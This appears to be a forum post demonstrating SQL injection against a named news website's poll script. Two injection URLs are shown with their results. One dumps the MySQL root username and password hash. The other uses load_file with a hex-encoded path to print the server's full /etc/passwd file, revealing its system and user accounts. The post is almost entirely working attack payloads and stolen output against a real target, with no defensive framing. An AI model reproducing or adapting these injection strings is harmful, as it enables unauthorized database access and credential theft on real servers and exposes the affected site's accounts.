http://www.nationmultimedia.com/qvote/view_poll.php?page=12&pid=-1+union+select+1,convert(concat(user,0x3a,password ),binary)+from+mysql.user/*
root:6b21310545272925
http://www.nationmultimedia.com/qvote/view_poll.php?page=12&pid=-1+union+select+1,convert(concat(load_file(0x2f6574 632f706173737764)),binary)+from+mysql.user/*
root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin news:x:9:13:news:/etc/news: uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin operator:x:11:0:operator:/root:/sbin/nologin games:x:12:100:games:/usr/games:/sbin/nologin gopher:x:13:30:gopher:/var/gopher:/sbin/nologin ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin nobody:x:99:99:Nobody:/:/sbin/nologin dbus:x:81:81:System message bus:/:/sbin/nologin vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin nscd:x:28:28:NSCD Daemon:/:/sbin/nologin rpm:x:37:37::/var/lib/rpm:/sbin/nologin haldaemon:x:68:68:HAL daemon:/:/sbin/nologin netdump:x:34:34:Network Crash Dump user:/var/crash:/bin/bash sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin rpc:x:32:32:Portmapper RPC user:/:/sbin/nologin rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin nfsnobody:x:4294967294:4294967294:Anonymous NFS User:/var/lib/nfs:/sbin/nologin mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin pcap:x:77:77::/var/arpwatch:/sbin/nologin apache:x:48:48:Apache:/var/www:/sbin/nologin webalizer:x:67:67:Webalizer:/var/www/usage:/sbin/nologin xfs:x:43:43:X Font Server:/etc/X11/fs:/sbin/nologin ntp:x:38:38::/etc/ntp:/sbin/nologin gdm:x:42:42::/var/gdm:/sbin/nologin mysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/bash hpsmh:x:79:79::/hpsmh:/sbin/nologin ftpnation:x:500:50:ftp user:/content:/bin/bash tee:x:501:501::/home/tee:/bin/bash njrooms:x:502:100::/content2/njrooms:/bin/bash nes:x:503:100::/content2/nes:/bin/bash worldfilmbkk:x:504:100::/content2/worldfilmbkk:/bin/bash njconnex:x:505:100::/content2/njconnex:/bin/bash internet:x:506:50:k nim request add:/content/images_news:/bin/bash slideshow:x:507:50:ftp user:/content/slideshow:/bin/bash
vBulletin® v3.8.14, Copyright ©2000-2026, vBulletin Solutions, Inc. Перевод: zCarot